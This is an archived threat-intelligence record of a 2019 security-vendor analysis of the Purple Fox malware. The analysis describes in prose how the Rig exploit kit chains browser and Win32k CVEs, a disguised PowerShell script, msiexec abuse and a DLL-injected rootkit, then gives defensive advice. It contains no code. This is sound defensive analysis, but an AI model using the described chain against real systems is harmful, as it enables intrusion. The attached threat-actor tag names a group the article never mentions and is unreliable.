{
	"id": "6d9c8166-fa65-4512-b361-9b1374a9b534",
	"created_at": "2026-04-06T00:21:23.11168Z",
	"updated_at": "2026-04-10T13:13:07.404072Z",
	"deleted_at": null,
	"sha1_hash": "3b68f88d45050d80f034ef834eccadb33eac6732",
	"title": "‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85073,
	"plain_text": "‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell\r\nPublished: 2019-09-09 · Archived: 2026-04-05 13:10:26 UTC\r\nExploit kits may no longer be as prolific as it was back when their activities were detected in the millions, but\r\ntheir recurring activities in the first half of 2019 indicate that they won’t be going away any time soon. The Rig\r\nexploit kit, for instance, is known for delivering various payloads — such as downloader trojans, ransomware,\r\ncryptocurrency-mining malware, and information stealers — whose arrival and delivery techniques are also\r\nconstantly fine-tuned.\r\nThe Purple Fox fileless downloader malware, which was reported to have at least affected 30,000 users last year,\r\nis a recent example. Also delivered by the Rig exploit kit, Purple Fox previously used the Nullsoft Scriptable\r\nInstall System (NSIS) tool to retrieve and execute its payload. We’ve also previously seen Purple Fox\r\ndownloading and executing cryptocurrency-mining malware.\r\nThis new iteration of Purple Fox that we came across, also being delivered by Rig, has a few new tricks up its\r\nsleeve. It retains its rootkit component by abusing publicly available code. It now also eschews its use of NSIS in\r\nfavor of abusing PowerShell, making Purple Fox capable of fileless infection. It also incorporated additional\r\nexploits to its infection chain, most likely as a foolproof mechanism to ensure that it can still infect the system.\r\nPurple Fox is a downloader malware; besides retrieving and executing cryptocurrency-mining threats, it can also\r\ndeliver other kinds of malware.\r\nFigure 1. Purple Fox’s infection chain that abuses PowerShell\r\nPurple Fox’s Infection Chain\r\nHere’s an overview of the infection chain of this new version of Purple Fox:\r\nOnce the user accesses a malicious site hosting one of Rig’s landing pages, there are three methods used to\r\nultimately redirect the user to a malicious PowerShell script that will, in turn, either directly execute Purple\r\nFox’s main component or escalate privileges in order to download and execute a file that would lead to\r\nPurple Fox:\r\n \r\nThrough a Flash (.swf) file that exploits CVE-2018-15982, which would lead to a malicious\r\nPowerShell script\r\nTwo .htm files that exploit CVE-2014-6332, a vulnerability in Internet Explorer’s VBScript engine;\r\nand CVE-2018-8174, a remote code execution (RCE) vulnerability in VBScript engine affecting\r\nvarious Windows versions (note that these vulnerabilities have long been patched). The .htm file\r\ncontaining an exploit for CVE-2018-8174 redirects to an HTML application (.hta) file.\r\nThe .hta file, which redirects to a malicious PowerShell script\r\nIf the current user account in the affected system has administrative access, the malicious PowerShell\r\nscript, posing as an image (.jpg) file, will abuse the application programming interface (API) of msi.dll —\r\na dynamic-link library (DLL) that contains functions for installing Microsoft Installer (.msi) packages — in\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/\r\nPage 1 of 3\n\norder to execute and install Purple Fox’s main component, which also poses as a randomly named image\r\nfile.\r\nIf the current user account does not have administration access, the PowerShell script would instead\r\nabuse a PowerSploit module (normally used by penetration testers) that will, in turn, exploit two\r\nvulnerabilities: CVE-2015-1701 and CVE-2018-8120. Both of these are privilege escalation flaws\r\nin Win32k, a multiuser driver in Windows.\r\nOnce the script successfully exploits CVE-2015-1701 and CVE-2018-8120, it will gain elevated\r\nprivileges, used to abuse msiexec.exe (an executable that enables the installation or modification of\r\n.msi files via command line) to download and execute Purple Fox’s main component.\r\nFigure 2. Snapshots of code showing: the .hta file, which leads to the malicious PowerShell script (top); how\r\nmsi.dll is abused (center); and how msiexec.exe is abused to download and execute Purple Fox's main component\r\n(bottom)\r\nPurple Fox’s Payload Delivery and Rootkit Component\r\nThe malware uses msi.dll’s MsiInstallProductA function to download and execute its payload — an .msi file that\r\ncontains an encrypted shellcode as well as 32-bit and 64-bit versions of the payload. Once executed, the malware\r\nrestarts the system and uses the PendingFileRenameOperations registry (responsible for storing names of files\r\nthat the OS will rename when it restarts) to rename its components.\r\nIt would then use its rootkit capability (hiding its files and registry entries) after the system is restarted. It creates a\r\nsuspended svchost process and injects a DLL that will then create a driver with the rootkit capability. Before\r\nproceeding further to the payload, it sets up the following in the injected DLL: a driver file (dump_{random\r\nhex}.sys), which is responsible for the rootkit capability; and its main component in the form of a DLL file\r\n(Ms{random hex}App.dll).\r\nUnlike the previous version of Purple Fox, however, this new iteration abuses an open-source code to enable its\r\nrootkit components, which includes hiding and protecting its files and registry entries. Also of note is the way this\r\nnew version of Purple Fox abuses a file utility software to hide its DLL component, which deters reverse\r\nengineering or cracking attempts.\r\nFigure 3. Snapshot of code showing how Purple Fox abuses an open-source code to hide and protect its\r\ncomponents and registry entries\r\nBest practices and Trend Micro solutions\r\nPurple Fox exemplifies what we’re seeing in this year’s threat landscape: a multilayered approach to how it “lives\r\noff the land.” Purple Fox’s emphasis on leaving a small footprint is also notable, with its abuse of legitimate tools\r\nand use of fileless techniques (e.g., DLL injection). Purple Fox also uses exploits for vulnerabilities with available\r\npatches. Its attack chain, for instance, exploits a vulnerability that was disclosed and patched five years ago. This\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/\r\nPage 2 of 3\n\nhighlights the significance of patching, especially for enterprises. And given how Purple Fox can deliver virtually\r\nany kind of threat, a defense-in-depth approach to securing online infrastructures is important. Here are some best\r\npractices that users and organizations can adopt:\r\nEnforce the principle of least privilege by restricting and securing the use of tools reserved for system\r\nadministrators.\r\nRegularly patch and update (or employ virtual patching for legacy or embedded systems or software).\r\nDeploy additional mechanisms that provide additional layers of security, such as behavior monitoring,\r\nwhich thwarts malware-related routines from being executed in the system; sandboxes, which can\r\nquarantine malicious files and further analyze suspicious behaviors; and firewalls and intrusion prevention\r\nand detection systems that can deter incursions or flag data exfiltration attempts.\r\nCultivate cybersecurity awareness at home and in the workplace, especially against email-borne threats that\r\nfileless threats could use as attack vectors or entry points.\r\nTrend Micro endpoint solutions such as the Smart Protection Suites and Worry-Free Business Security solutions,\r\nwhich have behavior monitoring capabilities, can protect users and businesses from these types of threats by\r\ndetecting malicious files, scripts, and messages as well as blocking all related malicious URLs.  Trend Micro Apex\r\nOne™ protection employs a variety of threat detection capabilities, notably behavioral analysis, which protect\r\nagainst malicious scripts, injection, ransomware, memory and browser attacks related to fileless threats.\r\nThe Trend Micro™ Deep Discovery Inspector solution protects customers from Rig exploit kit and Purple Fox via\r\nthese DDI rules:\r\n3286: RIG - Exploit Kit - HTTP (Request)\r\n4220: RIG - Exploit Kit - HTTP (Request)\r\nThe indicators of compromise (IoCs) are in this appendix. \r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-explo\r\nit-kit-now-abuses-powershell/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/"
	],
	"report_names": [
		"purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434883,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.pdf",
		"text": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.txt",
		"img": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.jpg"
	}
}